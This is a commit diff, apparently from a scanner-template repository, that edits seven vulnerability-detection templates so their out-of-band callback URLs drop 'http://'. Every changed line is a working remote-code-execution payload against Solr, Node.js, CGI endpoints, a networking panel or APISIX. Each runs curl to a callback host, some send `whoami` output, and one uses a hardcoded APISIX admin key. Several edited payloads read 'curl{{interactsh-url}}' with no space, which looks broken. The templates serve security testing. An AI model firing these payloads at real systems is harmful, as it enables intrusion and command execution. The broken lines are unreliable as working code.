Merge pull request #5193 from world-dv/master

Delete http://
patch-1
Prince Chaddha 2022-08-25 13:02:46 +05:30 committed by GitHub
commit 017445bc6c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
7 changed files with 7 additions and 7 deletions

View File

@ -34,7 +34,7 @@ requests:
Content-type: application/x-www-form-urlencoded Content-type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest X-Requested-With: XMLHttpRequest
command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20http://{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport
extractors: extractors:
- type: regex - type: regex

View File

@ -26,7 +26,7 @@ requests:
Authorization: Basic YWRtaW46cGFzcw== Authorization: Basic YWRtaW46cGFzcw==
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl http://{{interactsh-url}}") document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl{{interactsh-url}}")
matchers: matchers:
- type: word - type: word
part: interactsh_protocol # Confirms the HTTP Interaction part: interactsh_protocol # Confirms the HTTP Interaction

View File

@ -39,7 +39,7 @@ requests:
} }
- | - |
GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20http://{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1 GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Connection: close Connection: close

View File

@ -22,7 +22,7 @@ requests:
path: path:
- "{{BaseURL}}/cgi-bin/file_transfer.cgi" - "{{BaseURL}}/cgi-bin/file_transfer.cgi"
body: "file_transfer=new&dir=%27Pa_Noteexpr%20curl%2bhttp%3a//{{interactsh-url}}Pa_Note%27" body: "file_transfer=new&dir=%27Pa_Noteexpr%20curl%2b{{interactsh-url}}Pa_Note%27"
headers: headers:
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded

View File

@ -23,7 +23,7 @@ requests:
POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1 POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
"name":"';$(curl http://{{interactsh-url}});'", "name":"';$(curl {{interactsh-url}});'",
"email":"a@b.c" "email":"a@b.c"
matchers: matchers:

View File

@ -21,7 +21,7 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20http://{{interactsh-url}}/`whoami`;" - "{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20{{interactsh-url}}/`whoami`;"
matchers-condition: and matchers-condition: and
matchers: matchers:

View File

@ -41,7 +41,7 @@ requests:
{ {
"method":"PUT", "method":"PUT",
"path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1", "path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1",
"body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/{{randstr}}\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl https://{{interactsh-url}}/`whoami`'); return true end\"}" "body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/{{randstr}}\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl{{interactsh-url}}/`whoami`'); return true end\"}"
} }
] ]
} }